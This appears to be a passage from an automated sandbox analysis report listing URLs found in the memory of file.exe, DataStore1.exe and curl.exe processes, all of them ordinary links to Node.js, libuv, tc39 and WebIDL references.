Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
Source: DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412976136.000001AB73981000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
Source: file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/mafintosh/pump
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
Source: DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
Source: file.exe, 00000000.00000002.2425816128.0000017759770000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242705886.000000FC06341000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2413821370.0000007B5E641000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/1a96d83a223ff9f05f7d942fb84440d323f7b596/lib/internal/bootstrap/
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2413111118.000001EBEEA01000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/31074
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/34532
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35862
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39707
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39758
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412976136.000001AB73981000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
Source: DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
Source: file.exe, 00000000.00000003.2242705886.000000FC06341000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2413821370.0000007B5E641000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242359003.0000017759771000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.2381386123.0000027ACC612000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.2357942724.0000027ACC66E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.2357297070.0000027ACC655000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.2356764516.0000027ACC655000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33229
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33515.
Source: DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2413111118.000001EBEEA01000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2413111118.000001EBEEA01000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34385
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412976136.000001AB73981000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412639214.0000019143401000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: file.exe, 00000000.00000003.2242705886.000000FC06341000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2413821370.0000007B5E641000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242359003.0000017759771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg/issues/1589
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412858248.000000B2F61C1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#Replaceable
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2412486456.000002E8B60C1000.00000004.00001000.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: file.exe, 00000000.00000002.2427594959.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2075118983.00007FF67B459000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2412755369.0000027748301000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078984530.00000177514E8000.00000004.00000020.00020000.00000000.sdmp, DataStore1.exe, 0000000A.00000000.2387271990.00007FF771BB9000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
